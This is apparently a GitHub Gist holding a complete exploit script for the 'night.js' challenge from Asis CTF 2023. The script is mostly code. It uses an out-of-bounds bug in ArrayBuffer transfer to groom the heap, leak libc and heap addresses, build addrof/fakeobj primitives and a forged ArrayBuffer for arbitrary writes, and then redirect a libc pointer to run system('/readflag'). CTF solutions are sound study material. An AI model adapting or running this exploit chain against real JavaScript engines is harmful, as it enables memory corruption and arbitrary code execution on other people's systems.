Last active
September 24, 2023 14:46
-
-
Save po6ix/c4039fac5974cea2d3f246d18fa312fd to your computer and use it in GitHub Desktop.
Asis CTF 2023 - night.js exploit
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
refs = new Array(0x100); | |
// chunk consumer | |
for (let i = 0; i < 0x20; ++i) { | |
refs.push(new ArrayBuffer(0x200)); | |
refs.push(new Array(0x130)); | |
refs.push(new Array(0x40)); | |
} | |
// libc leak | |
{ | |
let leak_chunk1 = new ArrayBuffer(0x200); | |
let leak_chunk2 = new ArrayBuffer(0x200); | |
let leak_chunk3 = new ArrayBuffer(0x3df0); | |
let leak_chunk3_bi = new BigUint64Array(leak_chunk3); | |
let leak_chunk3_guard = new ArrayBuffer(0x200); | |
let oob_ab = new ArrayBuffer(0x210); | |
let oob_bi = new BigUint64Array(oob_ab); | |
oob_bi[64] = 0x0n; | |
oob_bi[65] = 0x4011n; | |
leak_chunk1.transfer(); | |
oob_ab.transferToFixedLength(0x200); | |
leak_chunk2.transfer(); | |
arr = new Array(0x40); | |
arr[0] = 1.1; | |
libc_leak = leak_chunk3_bi[0]; // +0x11abd00 | |
console.log(`libc_leak: 0x${libc_leak.toString(16)}`) | |
} | |
{ | |
let chunk1 = new ArrayBuffer(0x200); | |
let chunk2 = new ArrayBuffer(0x200); | |
let chunk3 = new ArrayBuffer(0x200); | |
let chunk3_bi = new BigUint64Array(chunk3); | |
let chunk4 = new ArrayBuffer(0x8000); | |
let chunk4_bi = new BigUint64Array(chunk4); | |
let command_buffer = new ArrayBuffer(0x400); | |
let command_buffer_bi = new BigUint64Array(command_buffer); | |
let oob_ab = new ArrayBuffer(0x210); | |
let oob_bi = new BigUint64Array(oob_ab); | |
oob_bi[64] = 0x0n; | |
oob_bi[65] = 0x421n; | |
chunk1.transfer(); | |
oob_ab.transferToFixedLength(0x200); | |
chunk2.transfer(); | |
let arr = new Array(130); | |
arr[66] = 13.37; | |
function addrof(o) { | |
arr[66] = o; | |
return chunk3_bi[0] & 0xffffffffffffn; | |
} | |
heap_leak = addrof(refs); | |
heap_base = heap_leak - 0x82f00n; | |
fake_ab_addr = heap_base + 0xfd010n; | |
console.log(`heap_leak: 0x${heap_leak.toString(16)}`); | |
console.log(`heap_base: 0x${heap_base.toString(16)}`); | |
console.log(`fake_ab_addr: 0x${fake_ab_addr.toString(16)}`); | |
arraybuffer_vtable = libc_leak + 0xa3a0a8n; | |
arraybuffer_prototype = heap_base + 0x83680n; | |
console.log(`arraybuffer_vtable: 0x${arraybuffer_vtable.toString(16)}`); | |
console.log(`arraybuffer_prototype: 0x${arraybuffer_prototype.toString(16)}`); | |
chunk4_bi[0x800-2] = heap_base + 0x000000000001a370n; | |
chunk4_bi[0x800+0] = arraybuffer_vtable; // vtable | |
chunk4_bi[0x800+1] = 0x1000n; // length | |
chunk4_bi[0x800+2] = arraybuffer_prototype; // prototype | |
chunk4_bi[0x800+12] = 0x1000n; // byteLength | |
chunk4_bi[0x800+14] = 0x1n; // isAttached | |
function fakeobj(addr) { | |
chunk3_bi[0] = addr | 0xfff9000000000000n; | |
return arr[66]; | |
} | |
let fake_ab = fakeobj(fake_ab_addr); | |
let fake_ab_bi = new BigUint64Array(fake_ab); | |
function write64(addr, value) { | |
chunk4_bi[0x808] = addr; | |
fake_ab_bi[0] = value; | |
} | |
command_buffer_bi[0] = 0x616c66646165722fn; | |
command_buffer_bi[1] = 0x67n; | |
// system("/readflag") | |
write64(libc_leak + 0xa57720n, libc_leak - 0x208ad0n); | |
command_buffer.transfer(); | |
while(1); | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment